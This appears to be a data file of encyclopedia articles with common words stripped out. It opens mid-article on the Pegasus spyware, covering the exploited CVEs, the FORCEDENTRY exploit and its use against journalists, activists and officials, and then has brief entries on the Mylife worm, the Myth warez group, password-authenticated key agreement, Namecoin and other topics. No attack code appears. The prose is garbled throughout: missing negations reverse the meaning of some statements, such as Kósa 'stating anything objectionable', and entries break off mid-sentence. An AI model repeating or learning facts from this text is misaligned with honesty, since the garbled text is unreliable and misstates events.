provided details three vulnerabilities: cve-2016-4655: information leak kernel kernel base mapping vulnerability leaks information attacker allowing calculate kernel's location memory. cve-2016-4656: kernel memory corruption leads jailbreak kernel-level vulnerabilities allow attacker secretly jailbreak device install surveillance software details reference. cve-2016-4657: memory corruption webkit vulnerability safari webkit allows attacker compromise device user clicks link.google's project zero documented another exploit, dubbed forcedentry, december 2021. according google's researchers, pegasus sent imessage targets contained appeared images, fact contained jbig2 image. vulnerability xpdf implementation jbig2, re-used apple's phone operating software, allowed pegasus construct emulated computer architecture inside jbig2 stream used implement zero-click attack. apple fixed vulnerability 14.8 september 2021 cve-2021-30860.as july 2021, pegasus likely uses many exploits, listed cves. pegasus anonymizing transmission network human rights group amnesty international reported 2021 investigation pegasus employs sophisticated command-and-control (c&amp;c) infrastructure deliver exploit payloads send commands pegasus targets. there least four known iterations infrastructure, dubbed pegasus anonymizing transmission network (patn) group, encompassing domain names, servers, network infrastructure. patn reportedly utilizes techniques registering high port numbers online infrastructure avoid conventional internet scanning. patn also uses three randomised subdomains unique exploit attempt well randomised paths. country although pegasus stated intended used criminals terrorists, also used authoritarian democratic governments critics opponents. special rapporteur freedom opinion found spyware abusive governments could "facilitate extrajudicial, summary arbitrary executions killings, enforced disappearance persons." armenia about twenty armenian citizens spied pegasus spyware. media expert arthur papyan said targeted figures opposition government current past government employees knew valuable state secrets political influence, including former director national security service current chairman center-right homeland party. local experts suspected targeted either government armenia azerbaijan, perhaps both. papyan said group appears jailbreaking phone provides interface viewing obtained data. minister high-tech industry vahagn khachaturyan also received warning letter apple, rejected theory spying party could current armenian government. azerbaijan list spied-upon citizens included dozens journalists activists azerbaijan. alleged mobile phones tapped. head azerbaijani service radio liberty/radio free europe (azadliq) jamie expressed anger revealed phones five current former employees tapped pegasus. bahrain citizen revealed government bahrain used group's pegasus hack activists, bloggers, members waad secular bahraini political society), member wefaq shiite bahraini political society), members bahrain center human rights. bahrain reportedly acquired access spyware 2017. report, mobile phones total nine rights activists “successfully hacked” june 2020 february 2021. those hacked included three members waad, three bchr, wefaq, exiled dissidents reside london. citizen attributed “with high confidence” pegasus operator, lulu, used bahraini government breach phones least four nine activists.in january 2022, bahrain accused using pegasus spyware hack human rights defender, ebtisam al-saegh. prominent activist's phone hacked least eight times august november 2019. citizen lab, following hacking attempt, al-saegh faced incidents harassed bahrain authorities. included summoned police station, interrogation, rape threats, physical sexual assault. attack left rights defender state “daily fear terror”.in february 2022, investigation citizen amnesty international revealed pegasus spyware used infect devices lawyer, online journalist, mental health counsellor bahrain. three activists critical bahraini authorities targeted pegasus june september 2021. three activists remained anonymous, mohammed al-tajer sharifa swar (mental health counselor). djibouti 2018, u.s. central intelligence agency purchased pegasus djibouti government conduct counter-terrorism operations (despite djibouti's poor human rights record). egypt egyptian mostafa madbouly selected potential targeting pegasus apparently saudi arabia. salvador january 2022, faro, prominent salvadoran news outlet, revealed majority staff phones infiltrated using pegasus. targeting uncovered investigation conducted citizen lab, access now; investigation revealed journalists another salvadoran news organisations targeted well. between july 2020 november 2021, pegasus deployed phones employees faro, including reporters, editors, staff. time targeting, faro looking governmental corruption scandals, government's clandestine dealings country's gangs. salvadoran government denied responsibility espionage, group declined reveal whether salvadoran government client. estonia estonia entered negotiations procure pegasus 2018, made million payment tool. estonia hoped tool russian phones (presumably gathering intelligence). israel initially approved export pegasus estonia, senior russian defense official approached israeli defense agencies revealed russia learned estonia's intentions obtain pegasus, israel decided disallow estonia using pegasus russian phone number (following heated debate among israeli officials) avoid damaging israeli relations russia. finland january 2022 finnish foreign ministry reported several phones finnish diplomats infected pegasus spyware. france july 2021, monde reported president france emmanuel macron french ministers flagged potential pegasus targets pegasus spying morocco; moroccan authorities denied pegasus labelled allegation "unfounded false". germany pegasus german federal criminal police office (bka). acquired pegasus 2019 "utmost secrecy", despite hesitations legal council. pegasus later revealed german media. hungary government viktor orbán authorized pegasus hungarian intelligence enforcement services target government's political opponents. orbán government accused using members media well hungarian opposition. according findings released july 2021, journalists managers media holdings appear spied hungarian government pegasus. phone numbers least lawyers, least journalists, opposition politician included leaked list potential pegasus surveillance targets.in november 2021, lajos kósa, head parliamentary defense enforcement committee, first hungarian senior official acknowledged country's interior ministry purchased used pegasus. kósa admitted hungary indeed purchased used pegasus, stating anything objectionable [...] large tech companies carry much broader monitoring citizens hungarian state does." india late 2019, facebook initiated suit nso, claiming pegasus used intercept whatsapp communications number activists, journalists, bureaucrats india, leading accusations indian government involved. individuals including human rights activists, scholars, journalists confirmed indian publication targeted.phone numbers indian ministers, opposition leaders, ex-election commissioners journalists allegedly found database hacking targets pegasus project 2021. phone numbers koregaon bhima activists compromising data implanted computers hack found pegasus surveillance phone number list.independent digital forensic analysis conducted indian phones whose numbers present data showed signs either attempted successful pegasus hack. results forensic analysis threw shows sequential correlations time date phone number entered list beginning surveillance. usually ranges minutes couple hours.11 phone numbers associated female employee supreme court india immediate family, accused former chief justice india, ranjan gogoi, sexual harassment, also allegedly found database indicating possibility phones snooped.records also indicate phone numbers political players karnataka appear selected around time intense power struggle taking place bharatiya janata party janata (secular)-congress-led state government 2019. iraq phone iraqi president barham salih found list potential pegasus surveillance targets (however actual targeting attempted successful could determined). targeting salih appeared linked saudi arabia uae. israel israeli police january 2022, reported pegasus unlawfully used israeli police monitor citizens well foreign nationals accidentally intentionally infected software. surveillance ordered high-ranking police officers, carried without warrants judicial supervision. legal basis spyware citizens disputed. police allegedly targeted civilians suspected crime, including organisers antigovernmental protesters, mayors, anti-lbgt parade activists, employees government-owned companies, associated senior politician, former government employees. case, alleged police targeted activist suspected crime, allegedly gather information activist's extra-marital affairs leverage.in cases, pegasus used obtain information unrelated ongoing investigation used later pressure subject investigation. cases, police used pegasus obtain incriminating information suspects' devices, concealed source incriminating information claiming would expose intelligence assets. while israeli police formally denied allegations report, senior police officials hinted claims true. report announcement number parallel investigations police's conduct, officials demanding commission inquiry. although attorney general launched internal probe allegations, privacy protection council (which advises minister justice), demanded state commission inquiry created.on february police admitted was, fact, misuse software. february widespread extent warrantless surveillance revealed included politicians government officials, heads corporations, journalists, activists, even avner netanyahu, then-prime minister, benjamin netanyahu. this renewed calls public inquiry, including current police commissioner kobi shabtai (appointed january 2021), well minister interior, ayelet shaked others.later day, minister public security (the minister responsible police), omer bar-lev, announced would forming commission inquiry, chaired retired judge. bar-lev stressed commission essentially granted powers state commission (whose formation requires full cabinet support), including authority subpoena witnesses, "regardless seniority," whose testimony used future prosecutions. despite this, calls state commission persisted several ex-ministry heads targeted. next day, state comptroller matanyahu englman, calling crisis "trampling values democracy privacy," said investigation launched office also extensive, adding include police, also ministry justice state attorney's office. jordan between august 2019 december 2021, apple phones four jordanian human rights activists, lawyers journalists hacked government client (apparently jordanian government agencies). jordanian government denied involvement.in january 2022, revealed jordanian lawyer activist hala ahed deeb's phone targeted pegasus. kazakhstan activists kazakhstan targeted, addition top-level officials, like kassym-jomart tokayev, askar mamin bakytzhan sagintayev. among 2000 targeted kazak numbers government critic bakhytzhan toregozhina, well journalists serikzhan mauletbay bigeldy gabdullin. most victims involved civic youth movement oyan, qazaqstan. mexico mexico first country purchase pegasus. early versions pegasus used surveil phone joaquín guzmán, known chapo. 2011, mexican president felipe calderón reportedly called thank company role guzmán's capture. when list 50,000 phone numbers potential pegasus surveillance targets (selected individual client governments) leaked 2021, third mexican.targeting scientists health campaigners 2017, citizen researchers revealed exploit links sent mexican scientists public health campaigners. targets supported measures reduce childhood obesity, including mexico's "soda tax."2014 iguala mass kidnapping july 2017, international team assembled investigate 2014 iguala mass kidnapping publicly complained thought surveilled mexican government. they stated mexican government used pegasus send messages funeral homes containing links which, clicked, allowed government surreptitiously listen investigators. mexican government repeatedly denied unauthorized hacking.assassination journalist cecilio pineda birto cecilio pineda birto, mexican freelance journalist assassinated hitmen resting hammock carwash. brito reporting ties local politicians criminal organizations, received anonymous death threats weeks preceding assassination; time, phone number selected possible target pegasus surveillance mexican pegasus client. pegasus spyware used ascertain brito's location carry geolocating phone; deployment pegasus phone could however confirmed phone disappeared scene murder.targeting presidential candidate obrador run-up 2018 mexican presidential election, dozens close associates presidential candidate andrés manuel lópez obrador (who subsequently elected) selected potential targets. potential targets included close family members, cardiologist, members personal political inner circle. recordings obrador's conversations family party colleagues subsequently leaked public attempt disrupt electoral campaign.use mexican drug cartels pegasus used drug cartels cartel-entwined government actors target intimidate mexican journalists.other widow slain renowned mexican journalist target attempted pegasus attack days husband assassinated. morocco 2019, moroccan pro-democracy campaigners notified whatsapp phones compromised pegasus.in june 2020, investigation amnesty international alleged moroccan journalist omar radi targeted moroccan government using israeli spyware pegasus. rights group claimed journalist targeted three times spied device infected tool. meanwhile, amnesty also claimed attack came group updated policy september 2019.in july 2021, revealed moroccan saad eddine el-othamani moroccan king mohammed selected targeting apparently moroccan state actors themselves.according revelatons july 2021, morocco targeted 6,000 algerian phones, including politicians high-ranking military officials, spyware. algerian government subsequently severed diplomatic relations morocco august 2021, citing alleged moroccan deployment pegasus algerian officials "hostile actions" undergirded decision. netherlands pegasus spyware used ridouan taghi, high profile criminal. after murder lawyer derk wiersum, aivd (dutch security service) asked help process catching ridouan taghi. panama president panama ricardo martinelli personally sought obtain cyberespionage tools election 2009. after rebuff u.s. 2009, martinelli successfully sought tools israeli vendors, expressing interest acquiring tool capable hacking mobile phones 2010 private meeting israeli netanyahu. 2012, systems installed panama city. equipment subsequently widely used illicit domestic foreign spying, including spying political opponents, magistrates, union leaders, business competitors, martinelli allegedly going order surveillance mistress using pegasus. palestine mobile phones palestinian activists hacked using pegasus attacks reportedly occurring back july 2020, according report front line defenders. salah hammouri, french-palestinian human rights defender victims victims pegasus attack, filed lawsuit france, accusing company privacy rights violation. poland pegasus licenses agreed benjamin netanyahu beata szydło july 2017. citizen revealed several members political opposition groups poland hacked pegasus spyware, raising alarming questions polish government's software. lawyer representing polish opposition groups prosecutor involved case ruling justice party also compromised.in december 2021, citizen announced pegasus used lawyer roman giertych prosecutor wrzosek, critical ruling justice (pis) government, giertych's phone suffering intrusions. hacks phone krzysztof brejza, senator opposition civic platform (po) uncovered, confirmed amnesty international. leading 2019 european polish parliamentary elections, brejza's text messages stolen leading opposition parties' campaign. texts doctored state-run media, notably tvp, used smear campaign opposition. this prompted polish senate begin inquiry deployment spyware.on january 2022, victims confirmed citizen lab, including michał kołodziejczak agrarian movement agrounia, tomasz szwejgiert, journalist alleged former associate cba.according supreme audit office (nik), employees' devices surveillance 7,300 times, could infected pegasus. rwanda joint investigation guardian monde alleged political activists rwanda targeted pegasus. saudi arabia december 2020, reported saudi arabia united arab emirates deployed zero-click imessage pegasus exploit london-based reporters journalists jazeera television network qatar.jamal khashoggi pegasus used saudi arabia jamal kashoggi, later killed turkey. october 2018, citizen reported software inner circle jamal khashoggi murder. citizen lab's october report stated high confidence nso's pegasus placed iphone saudi dissident omar abdulaziz, khashoggi's confidantes, months before. abdulaziz stated software revealed khashoggi's "private criticisms saudi royal family," according abdulaziz "played major role" khashoggi's death.in december 2018, york times investigation concluded pegasus software played role khashoggi's murder, friend khashoggi stating filing saudi authorities used israeli-made software dissident. shalev hulio stated company involved "terrible murder", declined comment reports personally traveled saudi capital riyadh million pegasus sale.in 2021, allegations arose software also used members kashoggi's family.targeting jeff bezos pegasus also used jeff bezos mohammed salman, crown-prince saudi arabia, exchanged messages exploited then-unknown vulnerabilities whatsapp.targeting journalist hubbard york times correspondent covering middle east, hubbard revealed october 2021 saudi arabia used group's pegasus software hack phone. hubbard targeted repeatedly three-year period june 2018 june 2021 reporting saudi arabia, writing book saudi crown prince mohammed salman. hubbard possibly targeted writing book crown prince, involvement revealing uae's hacking surveillance attempt project raven. saudis attempted peek hubbard's personal information twice 2018, suspicious text message arabic whatsapp message inviting protest saudi embassy washington. attacks launched 2020 2021 using zero-click hacking capabilities. lastly, june 2021, iphone belonging hubbard successfully hacked using forcedentry exploit. citizen said “high confidence” four attacks attempted using pegasus.other targets another saudi exile omar abdulaziz canada identified mckinsey company influential dissident, hence brothers imprisoned saudi authorities, cell phone hacked pegasus. south africa south african president cyril ramaphosa revealed selected potential target pegasus surveillance, possibly rwandan state. spain catalan basque officials independence proponents according investigation guardian país, pegasus software used government spain compromise phones several politicians active catalan independence movement, including president parliament catalonia roger torrent, former member parliament catalonia anna gabriel sabaté.the scandal resurfaced april 2022 following publication report citizenlab investigation revealed widespread pegasus catalan politicians citizens, well basque politician arnaldo otegi iñarritu. total victims identified, targets including elected officials (including high-ranking ones) civil society members (including activists, journalists, lawyers, computer scientists). true extent targeting potentially larger android devices common spain citizenlab tools specialised uncover infiltration apple devices. citizen attribute responsibility attacks perpetrators, note circumstantial evidence strongly suggests attacks perpetrated spanish government. 2022, spanish defense minister admitted surveillance people involved catalan independence movement. spanish government officials 2022, spanish government revealed smartphones prime minister pedro sánchez defense minister margarita robles targeted pegasus 2021. prime minister sanchez's device infected twice, robles' device infected once. total 2.7gb data exfiltrated device, data extracted defense minister's device. espionage today, denied attributed moroccan entities, given diplomatic tensions time target. thailand according report citizen digital reach, least political activists government critics thailand affected spyware. spokesperson ministry digital economy society stated ministry aware pegasus usage government. researcher citizen said targets confirmed definitively, expect actual number much higher. togo joint investigation guardian monde alleged pegasus software used critics government togo. uganda reported muhoozi kainerugaba brokered deal pegasus uganda, paying million 2019. software later used hack phones diplomats employees embassy uganda time 2021. ukraine least since 2019, ukraine sought obtain pegasus effort counter increasing threat russian aggression espionage, however, israel imposed near-total weapons sales ukraine (which also encompassed cyberespionage tools), wary selling pegasus states would tool russia damage relations russia. august 2021, time russian troops amassing ukrainian border, israel rebuffed request ukrainian delegation asking obtain pegasus; according ukrainian official familiar matter, pegasus could provided critical support ukraine's effort monitor russian military activity. wake 2022 russian invasion ukraine, ukrainian officials rebuked israel's tepid support ukraine israeli efforts maintain amicable relations russia. united arab emirates december 2020, reported saudi arabia united arab emirates deployed zero-click imessage pegasus exploit london-based reporters journalists jazeera television network qatar.the united arab emirates used pegasus members saudi-backed yemeni government according investigation published july 2021. used spyware monitor ministers internationally recognized government president abdrabbuh mansur hadi, including yemeni president family members, former prime minister ahmed obaid dagher, former foreign minister abdulmalik al-mekhlafi, current minister youth sports, nayef al-bakri.on september 2021, guardian reported telephone alaa al-siddiq, executive director alqst, died accident london june 2021, infected pegasus spyware years 2020. citizen confirmed emirati activist hacked government client israel's group. case represented worrying trend activists dissidents, escaped live relative safety, never reach pegasus.in october 2021, british high court ruled agents mohammed rashid maktoum used pegasus hack phones (ex)-wife, princess haya bint hussein, solicitors (including baroness fiona shackleton), personal assistant members security team summer 2020. court ruled agents acted "with express implied authority" sheikh; denied knowledge hacking. judgment referred hacking "serial breaches (uk) domestic criminal law", violation fundamental common echr rights", "interference process court mother's access justice" "abuse power" head state. contacted intermediary august 2020 inform princess haya hack believed terminated contract uae.on october 2021, group stated terminated contract pegasus spyware tool ruling uk’s high court dubai’s ruler misused firm’s pegasus software ex-wife legal advisers.in 2022, sources revealed unit dhabi’s mubadala investment company, mubadala capital largest investors billion novalpina capital private equity fund, bought group 2019. since then, mubadala investor firm commitment million, acquiring seat committee largest investors equity fund. journalists, human rights defenders women dubai’s royal family traced hacked using pegasus spyware time.a report citizen revealed pegasus spyware linked emirati operative used hack phones downing street foreign office. spyware attack july 2020, asserted infected phone british prime minister boris johnson. besides, least five attacks identified foreign office phones allies, including uae, july 2020 june 2021. also alleged hiring firm “monitor” jeremy corbyn. united kingdom april 2022, citizen released report stating downing street staff targeted pegasus, united arab emirates suspected originating attacks 2020 2021. united states group pitched spyware drug enforcement administration (dea), declined purchase high cost.in august 2016, group (through u.s. subsidiary westbridge) pitched u.s. version pegasus diego police department (sdpd). marketing material, westbridge emphasized company u.s.-based majority-owned u.s. parent company. sdpd sergeant responded sales pitch "sounds awesome". sdpd declined purchase spyware expensive.in july 2021, revealed phone numbers dozen u.s. citizens including diplomats, journalists, workers, dissident expatriots list prospective targets pegasus infiltration, however, known whether attack ever attempted completed devices. among phone numbers discovered list biden administration's chief negotiation joint comprehensive plan action well several united nations diplomats residing u.s. group said pegasus deployed device located within territory u.s., however, suggested u.s. citizens become targets abroad.in december 2021, reported pegasus spyware found preceding months iphones least nine u.s. state department employees, either stationed uganda worked matters related uganda. later month, reported total u.s. state department employees stationed uganda iphones hacked pegasus. government blacklisted group stop called "transnational repression".in january 2022, reported federal bureau investigation (fbi) secretly bought pegasus spyware 2019 seen demonstration phantom, newer tool could hack american phone numbers. they considered using tools domestic surveillance u.s., reportedly discussions united states department justice ultimately deciding using spyware 2021. however, despite ruling using pegasus equipment still fbi's possession jersey facility. responding reports, officials played domestic surveillance aspect pegasus testing, instead stressing counter-intelligence purported main purpose testing. however, document later obtained york times clearly showed agency weighed using pegasus domestic enforcement.l3harris, u.s. defense contractor, talks acquire group, maker pegasus. l3harris reportedly backing u.s. intelligence undertaking acquisition negotiations. after months negotiations, talks scuttled made known public news media june 2021, u.s. government publicly rebuking acquisition attempt. yemen forensic analysis independent investigator kamel jendoubi’s mobile phone revealed december 2021 targeted using spyware probing crimes yemen. jendoubi targeted examining possible crimes yemen. jendoubi's mobile number also found leaked database peg</t>
  </si>
  <si>
    <t>Myki (password manager)</t>
  </si>
  <si>
    <t>myki password manager authenticator developed myki security. myki available (requires ios10 higher) android (requires android higher), browser extensions chrome, firefox, safari, opera microsoft edge, standalone desktop windows, macos, linux, arch linux, debian. available english, arabic, french, german, italian, portuguese spanish. march 2022, myki announced jumpcloud's acquisition myki april 2022, myki ceased operate. product overview myki password manager authenticator offline (data stored smartphone, cloud) free mobile application storing managing passwords, credit cards, government notes. myki available android available browser extensions chrome, firefox. safari opera. standalone desktop windows (requires windows higher), macos (requires macos 10.12 higher), linux (.appimage .snap), arch linux (.pacman), debian (.deb).myki teams offline password manager teams. myki managed service providers enables msps manage passwords multiple companies administer.myki named best password managers 2018 globally magazine. history myki security founded 2015 antoine vincent jebara priscilla elora sharuk. myki launched product private beta september 2016.in 2016, myki first mena-based company selected compete techcrunch disrupt battlefield francisco, california.in january 2017, myki raised $1.2 million beco capital dubai, united arab emirates, leap ventures venture partners beirut, lebanon. support february 2022, reported jumpcloud, american enterprise software company louisville, colorado, acquired myki security.in march 2022, myki announced discontinuation products april 2022, pushing support library help users export data myki day. they also mentioned confident world encounter products future albeit different shape form. also list password managers lastpass references external links official website</t>
  </si>
  <si>
    <t>Mylife (computer worm)</t>
  </si>
  <si>
    <t>mylife, discovered messagelabs 2002, computer worm spreads sending email addresses found microsoft outlook's contacts list. written visual basic, displays image girl holding flower attempts delete files certain filename extensions. named phrase appearing subject lines emails sends. variant, mylife.b, also called bill clinton worm, instead uses subject line "bill caricature" displays cartoon image bill clinton playing saxophone. many additional variants reported. when infected file run, picture closed, worm runs payload. mylife checks current date. minute value higher (for example: 11:45 11:59), worm searches directory deletes .sys files, .com files drives. references</t>
  </si>
  <si>
    <t>Myth (warez)</t>
  </si>
  <si>
    <t>myth warez group, focused cracking ripping games. besides ripped games, group also released trainers cracked updates games. myth's slogan, "myth, always ahead class", referring rival group class existed 1997 2004. history myth formed february 2000, merger origin paradigm. june 2005, group targeted alongside several groups "operation site down" conducted fbi. myth made releases following raid, october 2005 released declaring group would enter hibernation. payne controversy cracked version payne using no-cd executable myth made available digital distribution service steam 2010, rolled back older update. however, ascii myth logo still present file called testapp.exe. also list warez groups standard (warez) warez scene references</t>
  </si>
  <si>
    <t>Password-authenticated key agreement</t>
  </si>
  <si>
    <t>cryptography, password-authenticated agreement method interactive method parties establish cryptographic keys based party's knowledge password. important property eavesdropper man-in-the-middle cannot obtain enough information able brute-force guess password without interactions parties (few) guesses. this means strong security obtained using weak passwords. types password-authenticated agreement generally encompasses methods balanced password-authenticated exchange augmented password-authenticated exchange password-authenticated retrieval multi-server methods multi-party methodsin stringent password-only security models, requirement user method remember secret public data password. password-authenticated exchange (pake) method parties, based knowledge shared password, establish cryptographic using exchange messages, unauthorized party (one controls communication channel possess password) cannot participate method constrained much possible brute-force guessing password. (the optimal case yields exactly guess exchange.) forms pake balanced augmented methods. balanced pake balanced pake assumes parties either client-client client-server situation secret password negotiate authenticate shared key. examples are: encrypted exchange (eke) speke (simple password exponential exchange) elliptic curve based secure remote password protocol (ec-srp srp5) there free java card implementation. dragonfly ieee 802.11-2012, 5931, 6617 cpace spake1 spake2 sespake 8133 j-pake (password authenticated exchange juggling) iso/iec 11770-4 (2017), 8236 itu-t recommendation x.1035 "advanced modular handshake agreement optional authentication" augmented pake augmented pake variation applicable client/server scenarios, server store password-equivalent data. this means attacker stole server data still cannot masquerade client unless first perform brute force search password. some augmented pake systems oblivious pseudorandom function user's secret password server's secret salt value, user never learns server's secret salt value server never learns user's password password-equivalent value) final key.examples include: augmented-eke b-speke pak-x augpake opaque aucpace spake2+ "advanced modular handshake agreement optional authentication" retrieval password-authenticated retrieval process client obtains static password-based negotiation server knows data associated password, ford kaliski methods. stringent setting, party uses password conjunction (two more) servers retrieve static key. this completed protects password (and key) even servers completely compromised. brief history first successful password-authenticated agreement methods encrypted exchange methods described steven bellovin michael merritt 1992. although several first methods flawed, surviving enhanced forms effectively amplify shared password shared key, used encryption and/or message authentication. first provably-secure pake protocols given work bellare, pointcheval, rogaway (eurocrypt 2000) boyko, mackenzie, patel (eurocrypt 2000). these protocols proven secure so-called random oracle model even stronger variants), first protocols proven secure standard assumptions goldreich lindell (crypto 2001) serves plausibility proof efficient, katz, ostrovsky, yung (eurocrypt 2001) practical. first password-authenticated retrieval methods described ford kaliski 2000. considerable number alternative, secure pake protocols given work bellare, pointcheval, rogaway, variations, security proofs proposed growing class password-authenticated agreement methods. current standards methods include ietf 2945, 5054, 5931, 5998, 6124, 6617, 6628 6631, ieee 1363.2-2008, itu-t x.1035 iso-iec 11770-4:2006. pake selection process internet protocols request internet engineering task force ietf, pake selection process carried 2018 2019 irtf crypto forum research group (cfrg). selection process carried several rounds. final round 2019 four finalists aucpace, opaque (augmented cases) cpace, spake2 (balanced pake) prevailed. result cfrg selection process, winner protocols declared "recommended cfrg usage ietf protocols": cpace opaque. also cryptographic protocol ieee p1363 simultaneous authentication equals outline cryptography zero-knowledge password proof references further reading bellare, pointcheval; rogaway (2000). authenticated exchange secure dictionary attacks. advances cryptology eurocrypt 2000 lncs. lecture notes computer science. vol. 1807. springer-verlag. 139–155. doi:10.1007/3-540-45539-6_11. isbn 978-3-540-67517-4. bellovin, merritt (may 1992). encrypted exchange: password-based protocols secure against dictionary attacks. proceedings i.e.e.e. symposium research security privacy. oakland. doi:10.1109/risp.1992.213269. isbn 978-0-8186-2825-2. s2cid 16063466. ford, kaliski (14–16 june 2000). server-assisted generation strong secret password. proceedings ieee international workshops enabling technologies: infrastructure collaborative enterprises. gaithersburg nist. 176. citeseerx 10.1.1.17.9502. doi:10.1109/enabl.2000.883724. isbn 978-0-7695-0798-9. s2cid 1977743. goldreich, lindell (2001). session-key generation using human passwords only. advances cryptology crypto 2001 lncs. lecture notes computer science. vol. 2139. springer-verlag. 408–432. doi:10.1007/3-540-44647-8_24. isbn 978-3-540-42456-7. ieee 1363.2-2008: ieee standard specifications password-based public-key cryptographic techniques. ieee. 2009. isbn 978-0-7381-5806-8. oclc 319883358. katz, ostrovsky; yung (2001). "efficient password-authenticated exchange using human-memorable passwords" (pdf). international association cryptologic research. springer-vergal. (september 2000). "the authentication exchange system". editor. doi:10.17487/rfc2945. 2945. taylor, mavrogiannopoulos, perrin, (november 2007). "using secure remote password (srp) protocol authentication". editor. doi:10.17487/rfc5054. 5054. harkins, zorn, (august 2010). "extensible authentication protocol (eap) authentication using only password". editor. doi:10.17487/rfc5931. 5931. sheffer, zorn, tschofenig, fluhrer, (february 2011). authentication method based encrypted exchange (eke) protocol". editor. doi:10.17487/rfc6124. 6124. harkins, (june 2012). "secure pre-shared (psk) authentication internet exchange protocol (ike)". editor. doi:10.17487/rfc6617. 6617. iso/iec 11770-4:2006 information technology—security techniques—key management—part mechanisms based weak secrets. ieee 802.11-2012: ieee standard information technology part wireless medium access control (mac) physical layer (phy) specification. ieee. 2012. isbn 978-0-7381-8469-2. oclc 1017978449. jarecki, stanislaw; krawczyk, hugo; jiayu (2018). opaque: asymmetric pake protocol secure against pre-computation attacks (pdf). advances cryptology. lecture notes computer science. vol. 10822. 456–486. doi:10.1007/978-3-319-78372-7_15. isbn 978-3-319-78371-0. smyshlyaev, stanislav; oshkin, igor; alekseev, evgeniy; ahmetzyanova, liliya (2015). security password authenticated exchange protocol" (pdf). cryptology eprint archive (report 2015/1237). external links ieee p1363 working group ieee 1363.2-2008: ieee standard specifications password-based public-key cryptographic techniques david jablon's links password-based cryptography simple password-based encrypted exchange protocols abdalla 2005</t>
  </si>
  <si>
    <t>Peppercoin</t>
  </si>
  <si>
    <t>peppercoin cryptographic system processing micropayments. peppercoin inc. company offers services based peppercoin method. peppercoin system developed silvio micali rivest first presented conference 2002 (although named.) core idea bill randomly selected transaction lump money rather bill transaction small amount. uses "universal aggregation", means aggregates transactions users, merchants well payment service providers. random selection cryptographically secure—it cannot influenced parties. claimed reduce transaction cost dollar cents "well cents."peppercoin, inc. privately held company founded late 2001 micali rivest based waltham, secured $15m venture capital rounds funding. services seen modest adoption. peppercoin collects 5-9% transaction cost merchant. peppercoin, inc. bought 2007 chockstone undisclosed amount. references</t>
  </si>
  <si>
    <t>Password synchronization</t>
  </si>
  <si>
    <t>password synchronization process, usually supported software password managers, user maintains single password across multiple systems.provided systems enforce mutually-compatible password standards (e.g. concerning minimum maximum password length, supported characters, etc.), user choose password time deploy password login accounts across multiple, linked systems. where different systems mutually incompatible standards regarding stored password field, user forced choose (but still fewer number systems) passwords. this happen, example, maximum password length system shorter minimum length another, system requires punctuation mark another forbids password synchronization function certain identity management systems considered easier implement enterprise single sign-on (sso), normally client software deployment need active user enrollment. uses password synchronization makes easier users recall passwords manage access multiple systems, example enterprise network. since remember passwords, users less likely forget write down, resulting fewer calls help desk less opportunity coworkers, intruders thieves gain improper access. through suitable security awareness, automated policy enforcement training activities, users encouraged forced choose stronger passwords fewer remember. security single, synchronized password compromised (for example, guessed, disclosed, determined cryptanalysis systems, intercepted insecure communications path, user socially engineered resetting known value), systems share password vulnerable improper access. single sign-on password vault solutions, compromise primary master password words, password used unlock access individual unique passwords used systems) also compromises associated systems, approaches similar. depending software used, password synchronization triggered password change synchronized systems (whether initiated user administrator) and/or user initiating change centrally software, perhaps interface. some password synchronization systems copy password hashes system another, hashing algorithm same. general, case access plaintext password required. videos processes yields synchronized passwords shown following animations, hosted software vendor hitachi systems: references</t>
  </si>
  <si>
    <t>Namecoin</t>
  </si>
  <si>
    <t>namecoin (symbol: {\displaystyle \mathbb nmc) cryptocurrency originally forked bitcoin software. uses proof-of-work algorithm. like bitcoin, limited million coins.namecoin store data within blockchain transaction database. original proposal namecoin called namecoin insert data bitcoin's blockchain directly. anticipating scaling difficulties approach, shared proof-of-work system proposed secure cryptocurrencies different cases. namecoin's flagship case censorship-resistant level domain .bit, functionally similar .com .net domains independent internet corporation assigned names numbers, main governing body domain names. practice, level domain used handful functional websites. 2019, opennic longer supports .bit domain. transactions peer-to-peer network similar bitcoin's handles namecoin's transactions, balances issuance sha256-based proof-of-work scheme (they issued small enough hash value found, point block created; process finding hashes creating blocks called mining). issuing rate forms geometric series, rate halves every 210,000 blocks, roughly every four years, reaching final total million nmc. records each namecoin record consists value bytes size. each actually path, namespace preceding name record. d/example signifies record stored namespace name example corresponds record example.bit website. content d/example expected conform namespace specification. current record 0.01 records expire 36000 blocks (~200 days) unless updated renewed. namecoins used purchase records marked used destroyed, giving miners would enable larger miners register names significant discount. uses .bit top-level domain, created outside commonly used domain name system, sanctioned icann. .bit domain served namecoin infrastructure, acts decentralized domain name system. proposed potential uses namecoin besides domain name registration include notary/timestamp systems. history september 2010, discussion started bitcointalk forum hypothetical system called bitdns generalizing bitcoin. gavin andresen satoshi nakamoto joined discussion bitcointalk forum supported idea bitdns, reward implementing bitdns announced forum december 2010. block 19200 namecoin activated merged mining upgrade allow mining bitcoin namecoin simultaneously, instead choose other; fixed issue miners jumping blockchain another profitability becomes favorable former.two years later, june 2013, nameid launched. nameid allows associate profile information identities namecoin blockchain, openid provider allow logging existing websites namecoin identities. main site accompanied open protocol password-less authentication namecoin identities, corresponding free-software implementation supporting extension firefox. october 2013, michael gronager, main developer libcoin, found security issue namecoin protocol, allowed modifying foreign names. successfully fixed short timeframe never exploited, except bitcoin.bit proof-of-concept.namecoin also mentioned icann public report well-known example distributing control privacy dns.a 2015 study found 120,000 domain names registered namecoin, use.in december 2018, proposal tabled opennic mailing list drop support namecoin .bit domains., citing spamhaus' (and extension antivirus software) blocking several servers owing spread malware .bit domains, well concerns potential child pornography. vote reach consensus.in month, opennic advised drop support .bit namespace owing security concerns namecoin prism break developers.in july 2019, opennic voted dropping .bit namespace, citing "numerous problems support namecoin domains" recent animosity projects. vote passed. namecoin developer jeremy rand welcomed move, thanking opennic describing "right decision". also alternative root zooko's triangle non-fungible token concept namecoin sometimes considered precursor references further reading judmayer, aljosha; stifter, nicholas; krombholz, katharina; weippl, edgar (2022) [2017]. blocks chains: introduction bitcoin, cryptocurrencies, their consensus mechanisms. cham: springer nature. 47–49. doi:10.1007/978-3-031-02352-1. isbn 978-3-031-01224-2. issn 1945-9742. retrieved 2022-06-25 google books. haferkorn, martin; quintana diaz, josué manual (2015). "seasonality interconnectivity within cryptocurrencies analysis basis bitcoin, litecoin namecoin". lugmayr, artur (ed.). enterprise applications services finance industry: international workshop, financecom 2014, sydney, australia, december 2014, revised papers. cham: springer nature. 110. doi:10.1007/978-3-319-28151-3. isbn 978-3-319-28150-6. issn 1865-1348. retrieved 2022-06-25 google books. karame, ghassan; androulaki, elli (2016). bitcoin blockchain 